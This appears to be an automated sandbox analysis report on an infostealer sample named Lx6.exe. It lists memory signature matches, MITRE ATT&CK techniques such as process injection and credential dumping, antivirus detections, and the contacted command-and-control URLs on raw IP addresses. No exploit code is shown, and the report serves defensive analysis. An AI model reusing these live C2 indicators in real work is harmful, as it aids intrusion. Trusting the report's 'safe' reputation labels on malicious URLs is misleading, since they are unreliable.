Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	421 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Obfuscated Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Access Token Manipulation	1 Software Packing	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 File Deletion	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	Logon Script (Mac)	813 Process Injection	1 Masquerading	NTDS	148 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Valid Accounts	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Modify Registry	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	813 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Rundll32	Network Sniffing	21 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	3 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Lx6.exe	67%	ReversingLabs	Win32.Infostealer.Convagent
Lx6.exe	64%	Virustotal		Browse
Lx6.exe	100%	Avira	TR/Crypt.XPACK.Gen7
Lx6.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.Lx6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.Lx6.exe.420000.1.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
0.2.Lx6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://curlmyip.net1g71lXXnduT6klnGfile://c:	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://194.76.225.61/doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif	0%	Avira URL Cloud	safe
http://ns.adobp/E	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr	0%	Avira URL Cloud	safe
http://194.76.225.60/doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr	0%	Avira URL Cloud	safe
http://curlmyip.net	0%	Avira URL Cloud	safe
https://www.hoeren-heute.ch/d/nulltarif_offer/?act=ACT0000045540ACT&utm_source=mcrs&utm_medi	0%	Avira URL Cloud	safe
http://ns.adobe.ux	0%	Avira URL Cloud	safe
https://www.hoeren-heute.ch/d/horizon_reveal/?act=ACT0000044974ACT&utm_source=mcrs&utm_mediu	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
http://curlmyip.net1g	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr	0%	Avira URL Cloud	safe
http://194.76.225.61/doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif	0%	Avira URL Cloud	safe
http://ns.micro/1	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a-0003.a-msedge.net	204.79.197.203	true	false	high
apnfy.msn.com	unknown	unknown	false	high
tel12.msn.com	unknown	unknown	false	high
www.msn.com	unknown	unknown	false	high
1.0.0.127.in-addr.arpa	unknown	unknown	false	high
8.8.8.8.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://194.76.225.61/doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif	true	Avira URL Cloud: safe	unknown
http://194.76.225.60/doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr	true	Avira URL Cloud: safe	unknown
http://194.76.225.61/doorway/b6wMkPt4iWosnbXK8RWvn/wQ2bkOJqcdbdcNhg/tg0Z3ks_2FXcWvb/njy6I8DMVjfhayfvGk/AHmjUevns/VlDNJo0_2B7BLsOhWepg/SFW_2F2h4VyZK2j7bvO/pwSb1f2R_2B4_2FNz_2Fk5/AtvhdDlWA69Wm/XRrBsoYg/JvQOOWqnl_2BSVvJf6ZjHAL/wi1PXKezi1/T9UASDBDRIpvMBY_2/FoQu0ao4VHCM/ZdN_2Bl0_2B/R_2BeX3PT9oLhg/3PUDsQH9gNCwUAZWN3W4_/2BLY_2F_2F1_2F3U/UklFvieJ/d91ke0Bg/KsQU9iQ.drr	true	Avira URL Cloud: safe	unknown
http://194.76.225.60/doorway/yww9t6EI6u3knXcyyJCm/k0PaEmMkYIgXI64U0Xz/raOOkTYJ1OffkP1wEWgVkk/KDIFR_2BFO6sY/C2PaBaPa/Sss01ix_2BadgeHfS9wHDYB/Y8ru3rQs3i/_2BVL_2F9XZIKlCI8/B1oNU6QkNaWX/PsYuvkPEO_2/F4YFTJXJbymKQ2/fHoiICtdHiiOAaF3y2_2B/YuR2etKSof76kp2a/rN6zIbIDcAsv1vB/ZbVJT7_2F5CmNDvPiV/bnGga5QOC/6JDIjD6kBTEGU_2FDRCY/QI5i_2BmMOmGPPVMPTI/LhHL9V2_2/Bt.drr	true	Avira URL Cloud: safe	unknown
http://www.msn.com/	false		high
http://194.76.225.61/doorway/bRzGSLjweAbH/PVfy51BTQqO/lWZDAcFYwrYEOw/P1069Ds4xjESTY05mmd1_/2ByVzroc4cimG4A8/PzkyhLRGCX0aFw5/Jtve4MdzfQJPkPgA2k/NTDeHmvoJ/_2B7yHjl7zuPv_2Brki5/vNALnLBqmQChxlgwPJX/YMRMYrIxai4T4_2BKHDViB/Hv_2BBzVFkjNS/FgarEETc/294Vv6pgzz58Ssm8O4z7jEg/g3Dq3u6_2B/toSBBRie0B5BZcweG/l7bNSU7DgvscLKrC/Sp3p.drr	true	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/	false		high
http://194.76.225.61/doorway/8DqiRUYpN1g/urg4gk8belU2Hp/6R_2FaNTBZnVkLTOVWhaX/cRir_2FDANkaaRhV/ClRbP8o7eYAfvcj/15sk13GdbMsMo5M_2F/JnE3OOrX1/Yn3LiAEserhxrqJvZEPb/e6YS2cNRsGxIjllZdqY/7_2FRYI58Sw6j4ExBQcowc/5qMbTW7lnZmjK/j8COe_2F/4naQldFBQDlP42ux0j7rpPZ/VYnkJGg8xi/iWRQWDs2GHiDVoqIT/U1cLh8zIJ54C/3jdFHxCPndA/7QWrJ8HiTz2ZrO/n84c0VWLTOO/rD8u.gif	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.msn.com/de-ch/news/other/r%c3%a4uber-muss-nach-%c3%bcberfallserie-mehr-als-drei-jahre-in	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://constitution.org/usdeclar.txtC:	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://curlmyip.net1g71lXXnduT6klnGfile://c:	RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	Lx6.exe, 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://ns.adobe.cmg	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	Lx6.exe, 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Lx6.exe, 00000000.00000003.388832296.000000000131B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ogp.me/ns/fb#	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.adobp/E	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com/	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/finanzen/nachrichten/angebotsmieten-in-allen-kantonen-gestiegen/ar-AA12OUn	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curlmyip.net1g	powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&anoncknm=%22%22&name=%22M	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ns.adobe.ux	RuntimeBroker.exe, 0000001B.00000000.629410549.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.609610192.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000000.634295929.000001D021902000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.854225233.000001D021902000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.tippsundtricks.co/sonstiges/diese-96-jahre-alte-dame-will-ihr-haus-verkaufen-wenn-du-dir	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/sport/other/z%c3%bcrich-und-winterthur-zeigten-wo-sie-stehen/ar-AA12LPId?o	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.558784999.0000021F35581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.861404017.00000191D4411000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/nachrichten/schweiz/ja-er-will-r%c3%b6sti-gibt-seine-kandidatur-bekannt/ar	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000000.541728807.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.481741357.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.517838181.0000000008260000.00000004.00000001.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.800187372.0000021F455E9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/news/other/bewaffnete-m%c3%a4nner-%c3%bcberfallen-luzerner-bar/ar-AA12NkUo	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://curlmyip.net	RuntimeBroker.exe, 00000013.00000002.860670049.000002240CD05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001B.00000002.858831162.000001D023E05000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000001F.00000002.856155256.000001489B505000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.856115183.00000191D3AAF000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000043.00000002.778448031.000001FA9DC8D000.00000004.00000020.00020000.00000000.sdmp, cvtres.exe, 00000059.00000002.827104369.000001AF8BB9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.tippsundtricks.co/lifehacks/dose-offnen/?utm_campaign=DECH-Dose&utm_source=MSN&u	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/de-ch/shopping	Lx6.exe, 00000000.00000003.345147291.0000000001299000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.561587239.0000021F35781000.00000004.00000800.00020000.00000000.sdmp	false		high
